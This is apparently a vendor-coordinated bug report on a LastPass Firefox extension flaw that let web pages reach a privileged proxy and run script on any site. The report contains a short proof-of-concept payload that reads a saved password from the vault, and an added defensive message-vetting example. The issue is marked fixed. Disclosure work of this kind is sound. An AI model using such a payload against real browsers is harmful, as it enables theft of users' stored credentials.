Issue metadata

Status: Fixed
Closed: May 2017

Issue 1217: LastPass: Firefox error pages still load Content Scripts, allowing access to ExtensionProxyService

Reported by, Mar 21 2017 Project Member

Issue description

The fix for issue 1209 was to prevent loading the special domain ``. This works in Chrome, but Firefox loads content scripts into error pages, allowing a similar vulnerability to be exploited.

The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.

This is effectively a UXSS, allowing anyone to compromise any website. But... because the URL being opened is from an extension, it can open non-websafe URLs, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:

            type: "ResetScript",
            data: [
                    appId: 1,
                    url: "resource://support-at-lastpass-dot-com/data/vault.html",
                    appName: "exploit",
                    username: "root",
                    script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);' 
                        +   'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
                        +   'throw 1;'
        }, "*")

I uploaded a demo version here (this URL is secret):

It reliably alert()s the password for a random site in my vault.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
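
One way a content script could vet page messages before they reach a privileged proxy, written from the defender's side (added example, not part of the original report and not LastPass's code; the trusted origin, the procedure names and every function name are hypothetical):

```javascript
"use strict";
// Hypothetical names throughout; this is not LastPass code.
// Constructed placeholder for the origin of the extension's own web UI.
const TRUSTED_ORIGINS = new Set(["https://ui.example.test"]);
// Procedures a page may request. Calls that take a URL plus a script
// (the ResetScript pattern in the report) are deliberately not listed.
const PAGE_CALLABLE = new Set(["GetVersion", "OpenVault"]);

const deny = (reason) => ({ allowed: false, reason });

// Decide whether a window "message" event may be forwarded to the
// privileged side. `win` is the window the content script runs in.
function vetMessage(event, win) {
  // Firefox error pages expose about:neterror / about:certerror in
  // documentURI, so check the document itself, not only its location.
  let doc;
  try {
    doc = new URL(win.document.documentURI);
  } catch (e) {
    return deny("unparseable-document");
  }
  if (doc.protocol !== "https:") return deny("document-not-https");
  if (!TRUSTED_ORIGINS.has(doc.origin)) return deny("document-not-trusted");
  // The sender must be this same window, speaking from the same origin.
  if (event.source !== win) return deny("foreign-source");
  if (event.origin !== doc.origin) return deny("origin-mismatch");
  const msg = event.data;
  if (msg === null || typeof msg !== "object" || typeof msg.type !== "string") {
    return deny("malformed");
  }
  if (!PAGE_CALLABLE.has(msg.type)) return deny("procedure-not-allowed");
  return { allowed: true, reason: "ok" };
}

// Constructed stand-ins for a content script's window and its events.
function makeWindow(documentURI) {
  return { document: { documentURI } };
}
function makeEvent(win, origin, type) {
  return { source: win, origin, data: { type } };
}
```

In a real content script the gate would sit at the top of the `message` listener, with `win` being `window`, and anything denied would be dropped before any proxy call is built.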

Comment 1 by, Mar 22 2017

Project Member
Labels: -Restrict-View-Commit
It looks like LastPass have released 4.1.36a which fixes this issue.

Firefox users should be automatically updated.

Thanks to LastPass for another super quick response.

Sidenote: I think it might be a Mozilla bug that neterror pages load content scripts; it feels unintentional. I'll file a low-priority Bugzilla bug later today.

Comment 2 by, May 4 2017

Project Member
Status: Fixed (was: New)

Comment 3 Deleted
